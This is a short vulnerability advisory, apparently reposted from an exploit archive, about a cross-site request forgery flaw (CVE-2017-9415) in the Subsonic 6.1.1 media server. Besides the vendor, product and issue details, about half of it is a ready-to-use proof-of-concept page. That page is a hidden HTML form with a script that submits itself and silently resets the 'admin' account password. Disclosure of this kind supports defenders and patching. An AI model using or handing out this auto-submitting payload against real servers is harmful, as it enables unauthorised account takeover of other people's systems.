Subsonic 6.1.1 - Cross-Site Request Forgery Vulnerability

[+] Credits: John Page a.k.a hyp3rlinx  
 
 
Vendor:
================
www.subsonic.org
 
 
 Product:
===============
subsonic v6.1.1
 
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
 
 
 
Vulnerability Type:
=====================
CSRF - Password Reset
 
 
 
CVE Reference:
==============
CVE-2017-9415
 
 
 
Security Issue:
================
Remote attackers can reset subsonic user account passwords if an authenticated user clicks a malicious link
or visits an attacker controlled webpage. However, username must be known or guessed.
 
 
 
 
Exploit/POC:
=============
<form  action="http://localhost:4040/userSettings.view" method="POST">
<input type="hidden" name="username"  value="admin">
<input type="hidden" name="transcodeSchemeName" value="OFF">
<input name="passwordChange" type="hidden" value="true"/>
<input type="hidden" name="_passwordChange" value="on"/>
<input  name="password" type="hidden" value="xyz123"/>
<input  name="confirmPassword" type="hidden" value="xyz123"/>
<input  name="email" type="hidden" value=""/>
<script>document.forms[0].submit()</script>
</form>

#  0day.today [2018-01-10]  #